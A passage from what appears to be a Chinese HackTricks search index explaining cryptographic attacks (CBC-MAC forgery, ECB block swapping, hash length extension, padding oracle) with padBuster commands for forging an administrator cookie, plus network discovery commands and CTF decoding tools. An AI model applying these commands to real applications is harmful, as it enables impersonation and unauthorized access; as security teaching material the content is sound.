然后,由m1和m2连接而成的消息(m3)将生成两个签名(s31和s32): E(m1 XOR 0) = s31 = s1 E(m2 XOR s1) = s32 这可以在不知道加密密钥的情况下计算。 想象一下你在 8字节 块中加密名称 Administrator : Administ rator\\\\00\\\\00\\\\00 你可以创建一个名为 Administ (m1)的用户名并获取签名(s1)。 然后,你可以创建一个用户名,称为rator\\\\00\\\\00\\\\00 XOR s1的结果。这将生成E(m2 XOR s1 XOR 0),即s32。 现在,你可以将s32用作完整名称 Administrator 
的签名。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Vulnerability","id":"10096","title":"Vulnerability"},"10097":{"body":"获取用户名 Administ (m1)的签名,即s1 获取用户名 rator\\\\x00\\\\x00\\\\x00 XOR s1 XOR 0 的签名,即s32**。** 将cookie设置为s32,它将是用户 Administrator 的有效cookie。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Summary","id":"10097","title":"Summary"},"10098":{"body":"如果你可以控制使用的IV,攻击可能会非常简单。 如果cookie仅仅是加密的用户名,要冒充用户“ administrator ”,你可以创建用户“ Administrator ”,你将获得它的cookie。 现在,如果你可以控制IV,你可以改变IV的第一个字节,使得 IV[0] XOR \\"A\\" == IV\'[0] XOR \\"a\\" ,并为用户 Administrator 重新生成cookie。这个cookie将有效地 冒充 用户 administrator ,使用初始 IV 。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Attack Controlling IV","id":"10098","title":"Attack Controlling IV"},"10099":{"body":"更多信息请参见 https://en.wikipedia.org/wiki/CBC-MAC tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cipher Block Chaining CBC-MAC » References","id":"10099","title":"References"},"101":{"body":"请注意, Discovering hosts from the outside ( TCP/HTTP/UDP/SCTP Port Discovery ) 中提到的技术也可以 在此应用 . 
但是,由于你与其他主机处于 同一网络 ,你可以做 更多事情 : bash #ARP discovery\\nnmap -sn #ARP Requests (Discover IPs)\\nnetdiscover -r #ARP requests (Discover IPs) #NBT discovery\\nnbtscan -r 192.168.0.1/24 #Search in Domain # Bettercap\\nnet.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD\\nset net.probe.mdns true/false #Enable mDNS discovery probes (default=true)\\nset net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)\\nset net.probe.upnp true/false #Enable UPNP discovery probes (default=true)\\nset net.probe.wsd true/false #Enable WSD discovery probes (default=true)\\nset net.probe.throttle 10 #10ms between probes sent (default=10) #IPv6\\nalive6 # Send a pingv6 to multicast.","breadcrumbs":"Pentesting Network » 主动","id":"101","title":"主动"},"1010":{"body":"有关隐私攻击和防御的全面列表,请访问 Bitcoin Privacy on Bitcoin Wiki 。","breadcrumbs":"Blockchain & Crypto » 更多","id":"1010","title":"更多"},"10100":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Crypto CTFs Tricks » Crypto CTFs Tricks","id":"10100","title":"Crypto CTFs Tricks"},"10101":{"body":"谷歌一下 http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240 https://www.onlinehashcrack.com/ https://crackstation.net/ https://md5decrypt.net/ https://www.onlinehashcrack.com https://gpuhash.me/ https://hashes.org/search.php https://www.cmd5.org/ https://hashkiller.co.uk/Cracker/MD5 https://www.md5online.org/md5-decrypt.html","breadcrumbs":"Crypto CTFs Tricks » 在线哈希数据库","id":"10101","title":"在线哈希数据库"},"10102":{"body":"https://github.com/Ciphey/Ciphey https://gchq.github.io/CyberChef/ (魔法模块) https://github.com/dhondta/python-codext https://www.boxentriq.com/code-breaking","breadcrumbs":"Crypto CTFs Tricks » 魔法自动解码器","id":"10102","title":"魔法自动解码器"},"10103":{"body":"大多数编码数据可以通过这两个资源解码: https://www.dcode.fr/tools-list https://gchq.github.io/CyberChef/","breadcrumbs":"Crypto CTFs Tricks » 编码器","id":"10103","title":"编码器"},"10104":{"body":"https://www.boxentriq.com/code-breaking/cryptogram https://quipqiup.com/ - 非常好! 
凯撒 - ROTx 自动解码器 https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript Atbash 密码 http://rumkin.com/tools/cipher/atbash.php","breadcrumbs":"Crypto CTFs Tricks » 替换自动解码器","id":"10104","title":"替换自动解码器"},"10105":{"body":"使用: https://github.com/dhondta/python-codext 检查所有这些基础 Ascii85 BQ%]q@psCd@rH0l Base26 [ A-Z ] BQEKGAHRJKHQMVZGKUXNT Base32 [ A-Z2-7= ] NBXWYYLDMFZGCY3PNRQQ==== Zbase32 [ ybndrfg8ejkmcpqxot1uwisza345h769 ] pbzsaamdcf3gna5xptoo==== Base32 Geohash [ 0-9b-hjkmnp-z ] e1rqssc3d5t62svgejhh==== Base32 Crockford [ 0-9A-HJKMNP-TV-Z ] D1QPRRB3C5S62RVFDHGG==== Base32 Extended Hexadecimal [ 0-9A-V ] D1NMOOB3C5P62ORFDHGG==== Base45 [ 0-9A-Z $%*+-./: ] 59DPVDGPCVKEUPCPVD Base58 (bitcoin) [ 1-9A-HJ-NP-Za-km-z ] 2yJiRg5BF9gmsU6AC Base58 (flickr) [ 1-9a-km-zA-HJ-NP-Z ] 2YiHqF5bf9FLSt6ac Base58 (ripple) [ rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz ] pyJ5RgnBE9gm17awU Base62 [ 0-9A-Za-z ] g2AextRZpBKRBzQ9 Base64 [ A-Za-z0-9+/= ] aG9sYWNhcmFjb2xh Base67 [ A-Za-z0-9- .!~_] NI9JKX0cSUdqhr!p Base85 (Ascii85) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] BQ%]q@psCd@rH0l Base85 (Adobe) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] <~BQ%]q@psCd@rH0l~> Base85 (IPv6 or RFC1924) [ 0-9A-Za-z!#$%&()*+-;<=>?@^ `{|}~_] Xm4yV_|Y(V{dF>` Base85 (xbtoa) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] xbtoa Begin\\\\nBQ%]q@psCd@rH0l\\\\nxbtoa End N 12 c E 1a S 4e6 R 6991d Base85 (XML) [_0-9A-Za-y!#$()*+,-./:;=?@^`{|}~z__] Xm4y|V{~Y+V}dF? 
Base91 [ A-Za-z0-9!#$%&()*+,./:;<=>?@[]^_`{|}~\\" ] frDg[*jNN!7&BQM Base100 [] 👟👦👣👘👚👘👩👘👚👦👣👘 Base122 [] 4F ˂r0Xmvc ATOM-128 [ /128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC ] MIc3KiXa+Ihz+lrXMIc3KbCC HAZZ15 [ HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5 ] DmPsv8J7qrlKEoY7 MEGAN35 [ 3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5 ] kLD8iwKsigSalLJ5 ZONG22 [ ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2 ] ayRiIo1gpO+uUc7g ESAB46 [] 3sHcL2NR8WrT7mhR MEGAN45 [] kLD8igSXm2KZlwrX TIGO3FX [] 7AP9mIzdmltYmIP9mWXX TRIPO5 [] UE9vSbnBW6psVzxB FERON74 [] PbGkNudxCzaKBm0x GILA7 [] D+nkv8C1qIKMErY1 Citrix CTX1 [] MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html - 404 Dead: https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html","breadcrumbs":"Crypto CTFs Tricks » 基础编码自动解码器","id":"10105","title":"基础编码自动解码器"},"10106":{"body":"╫☐↑Λ↻Λ┏Λ↻☐↑Λ http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html - 404 死链: https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html","breadcrumbs":"Crypto CTFs Tricks » HackerizeXS [ ╫Λ↻├☰┏ ]","id":"10106","title":"HackerizeXS [ ╫Λ↻├☰┏ ]"},"10107":{"body":".... --- .-.. -.-. .- .-. .- -.-. --- .-.. 
.- http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html - 404 死链接: https://gchq.github.io/CyberChef/","breadcrumbs":"Crypto CTFs Tricks » 摩尔斯","id":"10107","title":"摩尔斯"},"10108":{"body":"begin 644 webutils_pl\\nM2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(\\nM3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/\\nF3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`\\n`\\nend http://www.webutils.pl/index.php?idx=uu","breadcrumbs":"Crypto CTFs Tricks » UUencoder","id":"10108","title":"UUencoder"},"10109":{"body":"begin 644 webutils_pl\\nhG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236\\n5Hol-G2xAEE++\\nend www.webutils.pl/index.php?idx=xx","breadcrumbs":"Crypto CTFs Tricks » XXEncoder","id":"10109","title":"XXEncoder"},"1011":{"body":"","breadcrumbs":"Blockchain & Crypto » 匿名比特币交易","id":"1011","title":"匿名比特币交易"},"10110":{"body":"=ybegin line=128 size=28 name=webutils_pl\\nryvkryvkryvkryvkryvkryvkryvk\\n=yend size=28 crc32=35834c86 http://www.webutils.pl/index.php?idx=yenc","breadcrumbs":"Crypto CTFs Tricks » YEncoder","id":"10110","title":"YEncoder"},"10111":{"body":"(This file must be converted with BinHex 4.0)\\n:#hGPBR9dD@acAh\\"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da\\"5%p\\n-38K26%\'d9J!!: http://www.webutils.pl/index.php?idx=binhex","breadcrumbs":"Crypto CTFs Tricks » BinHex","id":"10111","title":"BinHex"},"10112":{"body":"<~85DoF85DoF85DoF85DoF85DoF85DoF~> http://www.webutils.pl/index.php?idx=ascii85","breadcrumbs":"Crypto CTFs Tricks » ASCII85","id":"10112","title":"ASCII85"},"10113":{"body":"drnajapajrna https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard","breadcrumbs":"Crypto CTFs Tricks » Dvorak 键盘","id":"10113","title":"Dvorak 键盘"},"10114":{"body":"字母对应其数字值 8 15 12 1 3 1 18 1 3 15 12 1","breadcrumbs":"Crypto CTFs Tricks » A1Z26","id":"10114","title":"A1Z26"},"10115":{"body":"字母到数字 (ax+b)%26 ( a 和 b 是密钥, x 是字母) 并将结果转换回字母 krodfdudfrod","breadcrumbs":"Crypto CTFs Tricks » 
仿射密码编码","id":"10115","title":"仿射密码编码"},"10116":{"body":"Multitap replaces a letter by repeated digits defined by the corresponding key code on a mobile phone keypad (此模式用于编写短信)。 例如:2=A,22=B,222=C,3=D... 您可以通过看到 多个数字重复 来识别此代码。 您可以在以下网址解码此代码: https://www.dcode.fr/multitap-abc-cipher","breadcrumbs":"Crypto CTFs Tricks » SMS Code","id":"10116","title":"SMS Code"},"10117":{"body":"将每个字母替换为4个A或B(或1和0) 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000\\nAABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA","breadcrumbs":"Crypto CTFs Tricks » Bacon Code","id":"10117","title":"Bacon Code"},"10118":{"body":"","breadcrumbs":"Crypto CTFs Tricks » Runes","id":"10118","title":"Runes"},"10119":{"body":"Raw Deflate 和 Raw Inflate (你可以在 Cyberchef 中找到这两者)可以在没有头部的情况下压缩和解压数据。","breadcrumbs":"Crypto CTFs Tricks » 压缩","id":"10119","title":"压缩"},"1012":{"body":"现金交易: 通过现金获取比特币。 现金替代品: 购买礼品卡并在线兑换比特币。 挖矿: 通过挖矿获得比特币是最私密的方法,尤其是单独进行时,因为挖矿池可能知道矿工的IP地址。 Mining Pools Information 盗窃: 理论上,盗窃比特币可能是另一种匿名获取比特币的方法,尽管这是非法的且不推荐。","breadcrumbs":"Blockchain & Crypto » 匿名获取比特币的方法","id":"1012","title":"匿名获取比特币的方法"},"10120":{"body":"","breadcrumbs":"Crypto CTFs Tricks » 简易加密","id":"10120","title":"简易加密"},"10121":{"body":"https://wiremask.eu/tools/xor-cracker/","breadcrumbs":"Crypto CTFs Tricks » XOR - 自动解密器","id":"10121","title":"XOR - 自动解密器"},"10122":{"body":"需要一个关键字 fgaargaamnlunesuneoa","breadcrumbs":"Crypto CTFs Tricks » Bifid","id":"10122","title":"Bifid"},"10123":{"body":"需要一个关键词 wodsyoidrods https://www.guballa.de/vigenere-solver https://www.dcode.fr/vigenere-cipher https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx","breadcrumbs":"Crypto CTFs Tricks » Vigenere","id":"10123","title":"Vigenere"},"10124":{"body":"","breadcrumbs":"Crypto CTFs Tricks » 强加密","id":"10124","title":"强加密"},"10125":{"body":"2 个 base64 字符串(令牌和密钥) Token:\\ngAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== 
Key:\\n-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= https://asecuritysite.com/encryption/ferdecode","breadcrumbs":"Crypto CTFs Tricks » Fernet","id":"10125","title":"Fernet"},"10126":{"body":"一个秘密被分成 X 部分,要恢复它需要 Y 部分 ( Y <=X )。 8019f8fa5879aa3e07858d08308dc1a8b45\\n80223035713295bddf0b0bd1b10a5340b89\\n803bc8cf294b3f83d88e86d9818792e80cd http://christian.gen.co/secrets/","breadcrumbs":"Crypto CTFs Tricks » Samir 秘密共享","id":"10126","title":"Samir 秘密共享"},"10127":{"body":"https://github.com/glv2/bruteforce-salted-openssl https://github.com/carlospolop/easy_BFopensslCTF","breadcrumbs":"Crypto CTFs Tricks » OpenSSL 暴力破解","id":"10127","title":"OpenSSL 暴力破解"},"10128":{"body":"https://github.com/Ganapati/RsaCtfTool https://github.com/lockedbyte/cryptovenom https://github.com/nccgroup/featherduster tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Crypto CTFs Tricks » 工具","id":"10128","title":"工具"},"10129":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 (ECB) 电子密码本 - 对称加密方案, 将明文的每个块 替换为 密文的块 。这是 最简单 的加密方案。其主要思想是将明文 分割 为 N位的块 (取决于输入数据块的大小和加密算法),然后使用唯一的密钥对每个明文块进行加密(解密)。 使用ECB有多种安全隐患: 可以删除加密消息中的块 可以移动加密消息中的块","breadcrumbs":"Electronic Code Book (ECB) » ECB","id":"10129","title":"ECB"},"1013":{"body":"通过使用混合服务,用户可以 发送比特币 并接收 不同的比特币作为回报 ,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,以确保其不保留日志并实际返回比特币。替代的混合选项包括比特币赌场。","breadcrumbs":"Blockchain & Crypto » 混合服务","id":"1013","title":"混合服务"},"10130":{"body":"想象一下,你多次登录一个应用程序,并且 总是获得相同的cookie 。这是因为该应用程序的cookie是**| 。 然后,你生成两个新用户,他们都有 相同的长密码 和 几乎相同的** 用户名 。 你发现 8B的块 中 两个用户的信息 是 相等 的。然后,你想象这可能是因为 正在使用ECB 。 如以下示例所示。观察这 两个解码的cookie 中有几次块**\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8**。 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x04\\\\xB6\\\\xE1H\\\\xD1\\\\x1E \\\\xB6\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8+=\\\\xD4F\\\\xF7\\\\x99\\\\xD9\\\\xA9 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x04\\\\xB6\\\\xE1H\\\\xD1\\\\x1E \\\\xB6\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8+=\\\\xD4F\\\\xF7\\\\x99\\\\xD9\\\\xA9 这是因为这些 cookie 的 用户名和密码包含了多次字母 \\"a\\" (例如)。 不同的 块 是包含 至少 1 个不同字符 的块(可能是分隔符 \\"|\\" 或用户名中的某些必要差异)。 现在,攻击者只需发现格式是 还是 。为此,他可以 生成多个相似且较长的用户名和密码,直到找到格式和分隔符的长度: 用户名长度: 密码长度: 用户名+密码长度: Cookie 长度(解码后): 2 2 4 8 3 3 6 8 3 4 7 8 4 4 8 16 7 7 14 16","breadcrumbs":"Electronic Code Book (ECB) » 漏洞检测","id":"10130","title":"漏洞检测"},"10131":{"body":"","breadcrumbs":"Electronic Code Book (ECB) » 漏洞利用","id":"10131","title":"漏洞利用"},"10132":{"body":"知道 cookie 的格式(|),为了冒充用户名 admin,创建一个名为 aaaaaaaaadmin 的新用户并获取 cookie 并解码它: \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\xE0Vd8oE\\\\x123\\\\aO\\\\x43T\\\\x32\\\\xD5U\\\\xD4 我们可以看到之前用仅包含 a 的用户名创建的模式 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8。 然后,您可以删除第一个 8B 块,您将获得一个有效的用户名 admin 的 cookie: \\\\xE0Vd8oE\\\\x123\\\\aO\\\\x43T\\\\x32\\\\xD5U\\\\xD4","breadcrumbs":"Electronic Code Book (ECB) » 
移除整个块","id":"10132","title":"移除整个块"},"10133":{"body":"在许多数据库中,搜索 WHERE username=\'admin\'; 或 WHERE username=\'admin \'; 是一样的 (注意额外的空格) 因此,冒充用户 admin 的另一种方法是: 生成一个用户名:len() + len( 将生成 2 个 8B 的块。 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:admin 该用户的 cookie 将由 3 个块组成:前 2 个是用户名 + 分隔符的块,第三个是密码(伪装成用户名):username |admin 然后,只需用最后一个块替换第一个块,就可以冒充用户 admin:admin |username","breadcrumbs":"Electronic Code Book (ECB) » 移动块","id":"10133","title":"移动块"},"10134":{"body":"http://cryptowiki.net/index.php?title=Electronic_Code_Book_(ECB) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Electronic Code Book (ECB) » 参考","id":"10134","title":"参考"},"10135":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hash Length Extension Attack » Hash Length Extension Attack","id":"10135","title":"Hash Length Extension Attack"},"10136":{"body":"想象一个服务器,它通过将一个 秘密 附加到一些已知的明文数据上并对这些数据进行 签名 。如果你知道: 秘密的长度 (这也可以从给定的长度范围中暴力破解) 明文数据 算法(并且它对这种攻击是脆弱的) 填充是已知的 通常使用默认填充,因此如果满足其他三个要求,这也是 填充根据秘密+数据的长度而变化,这就是为什么需要知道秘密的长度 那么, 攻击者 可以 附加 数据 并为 之前的数据 + 附加的数据 生成一个有效的 签名 。","breadcrumbs":"Hash Length Extension Attack » 攻击总结","id":"10136","title":"攻击总结"},"10137":{"body":"基本上,脆弱的算法首先通过 哈希一个数据块 来生成哈希,然后,从 之前 创建的 哈希 (状态)中, 添加下一个数据块 并 哈希它 。 然后,想象秘密是“secret”,数据是“data”,\\"secretdata\\"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。 如果攻击者想要附加字符串“append”,他可以: 生成64个“A”的MD5 将之前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b 附加字符串“append” 完成哈希,结果哈希将是“secret” + “data” + “padding” + “append”的 有效哈希","breadcrumbs":"Hash Length Extension Attack » 如何?","id":"10137","title":"如何?"},"10138":{"body":"GitHub - iagox86/hash_extender","breadcrumbs":"Hash Length Extension Attack » 工具","id":"10138","title":"工具"},"10139":{"body":"你可以在 https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks 找到对这个攻击的详细解释。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hash Length Extension Attack » 参考文献","id":"10139","title":"参考文献"},"1014":{"body":"CoinJoin 将来自不同用户的多个交易合并为一个,复杂化了任何试图将输入与输出匹配的过程。尽管其有效性,具有独特输入和输出大小的交易仍然可能被追踪。 可能使用CoinJoin的示例交易包括 402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a 和 85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238。 有关更多信息,请访问 CoinJoin 。有关以太坊上的类似服务,请查看 Tornado Cash ,它通过矿工的资金匿名化交易。","breadcrumbs":"Blockchain & Crypto » CoinJoin","id":"1014","title":"CoinJoin"},"10140":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Padding Oracle » Padding Oracle","id":"10140","title":"Padding Oracle"},"10141":{"body":"在 CBC 模式下, 前一个加密块用作 IV ,与下一个块进行异或操作: https://defuse.ca/images/cbc_encryption.png 要解密 CBC,需进行 相反的 操作 : https://defuse.ca/images/cbc_decryption.png 注意需要使用 加密 密钥 和 IV 。","breadcrumbs":"Padding Oracle » CBC - 密码块链接","id":"10141","title":"CBC - 密码块链接"},"10142":{"body":"由于加密是在 固定 大小 块 中进行的,通常需要在 最后 块 中进行 填充 以完成其长度。 通常使用 PKCS7 ,它生成的填充 重复 所需的 字节 数 以 完成 块。例如,如果最后一个块缺少 3 个字节,填充将是 \\\\x03\\\\x03\\\\x03。 让我们看更多的例子,使用 2 个长度为 8 字节的块 : byte #0 byte #1 byte #2 byte #3 byte #4 byte #5 byte #6 byte #7 byte #0 byte #1 byte #2 byte #3 byte #4 byte #5 byte #6 byte #7 P A S S W O R D 1 2 3 4 5 6 0x02 0x02 P A S S W O R D 1 2 3 4 5 0x03 0x03 0x03 P A S S W O R D 1 2 3 0x05 0x05 0x05 0x05 0x05 P A S S W O R D 0x08 0x08 0x08 0x08 0x08 0x08 0x08 0x08 注意在最后一个例子中, 最后一个块是满的,因此只生成了一个填充块 。","breadcrumbs":"Padding Oracle » 消息填充","id":"10142","title":"消息填充"},"10143":{"body":"当应用程序解密加密数据时,它将首先解密数据;然后将移除填充。在清理填充的过程中,如果 无效填充触发可检测的行为 ,则存在 填充 oracle 漏洞 。可检测的行为可以是 错误 、 缺少结果 或 响应变慢 。 
如果您检测到这种行为,您可以 解密加密数据 ,甚至 加密任何明文 。","breadcrumbs":"Padding Oracle » 填充 Oracle","id":"10143","title":"填充 Oracle"},"10144":{"body":"您可以使用 https://github.com/AonCyberLabs/PadBuster 来利用这种漏洞,或者直接进行 sudo apt-get install padbuster 为了测试一个网站的cookie是否存在漏洞,你可以尝试: bash perl ./padBuster.pl http://10.10.10.10/index.php \\"RVJDQrwUdTRWJUVUeBKkEA==\\" 8 -encoding 0 -cookies \\"login=RVJDQrwUdTRWJUVUeBKkEA==\\" 编码 0 意味着使用 base64 (但还有其他可用的编码,请查看帮助菜单)。 您还可以 利用此漏洞加密新数据。例如,假设 cookie 的内容是 \\" user=MyUsername \\",那么您可以将其更改为 \\"_user=administrator_\\",并在应用程序中提升权限。您还可以使用 paduster 指定 -plaintext 参数来实现这一点: bash perl ./padBuster.pl http://10.10.10.10/index.php \\"RVJDQrwUdTRWJUVUeBKkEA==\\" 8 -encoding 0 -cookies \\"login=RVJDQrwUdTRWJUVUeBKkEA==\\" -plaintext \\"user=administrator\\" 如果网站存在漏洞,padbuster将自动尝试查找何时发生填充错误,但您也可以使用**-error**参数指示错误消息。 bash perl ./padBuster.pl http://10.10.10.10/index.php \\"\\" 8 -encoding 0 -cookies \\"hcon=RVJDQrwUdTRWJUVUeBKkEA==\\" -error \\"Invalid padding\\"","breadcrumbs":"Padding Oracle » 如何利用","id":"10144","title":"如何利用"},"10145":{"body":"总结 来说,您可以通过猜测可以用于创建所有 不同填充 的正确值来开始解密加密数据。然后,填充oracle攻击将从末尾到开头解密字节,猜测哪个将是 创建1、2、3等填充的正确值 。 想象一下,您有一些加密文本,占据由 E0到E15 的 2个块 。 为了 解密 最后一个 块 ( E8 到 E15 ),整个块通过“块密码解密”,生成 中间字节I0到I15 。 最后,每个中间字节与之前的加密字节(E0到E7)进行 异或 运算。因此: C15 = D(E15) ^ E7 = I15 ^ E7 C14 = I14 ^ E6 C13 = I13 ^ E5 C12 = I12 ^ E4 ... 
现在,可以 修改E7直到C15为0x01 ,这也将是一个正确的填充。因此,在这种情况下:\\\\x01 = I15 ^ E\'7 因此,找到E\'7后,可以 计算I15 :I15 = 0x01 ^ E\'7 这使我们能够 计算C15 :C15 = E7 ^ I15 = E7 ^ \\\\x01 ^ E\'7 知道 C15 后,现在可以 计算C14 ,但这次是通过暴力破解填充\\\\x02\\\\x02。 这个暴力破解与之前的复杂度相同,因为可以计算出值为0x02的E\'\'15:E\'\'7 = \\\\x02 ^ I15,因此只需找到生成**C14等于0x02的**E\'14。 然后,执行相同的步骤来解密C14: C14 = E6 ^ I14 = E6 ^ \\\\x02 ^ E\'\'6 按照这个链条,直到您解密整个加密文本。","breadcrumbs":"Padding Oracle » 理论","id":"10145","title":"理论"},"10146":{"body":"注册并使用该账户登录。 如果您 多次登录 并始终获得 相同的cookie ,那么应用程序中可能 存在问题 。每次登录时 返回的cookie应该是唯一的 。如果cookie 始终 相同,它可能始终有效,并且 无法使其失效 。 现在,如果您尝试 修改 该 cookie ,您会看到应用程序返回一个 错误 。 但是,如果您暴力破解填充(例如使用padbuster),您可以获得另一个有效的cookie,适用于不同的用户。这个场景很可能对padbuster存在漏洞。","breadcrumbs":"Padding Oracle » 漏洞检测","id":"10146","title":"漏洞检测"},"10147":{"body":"https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 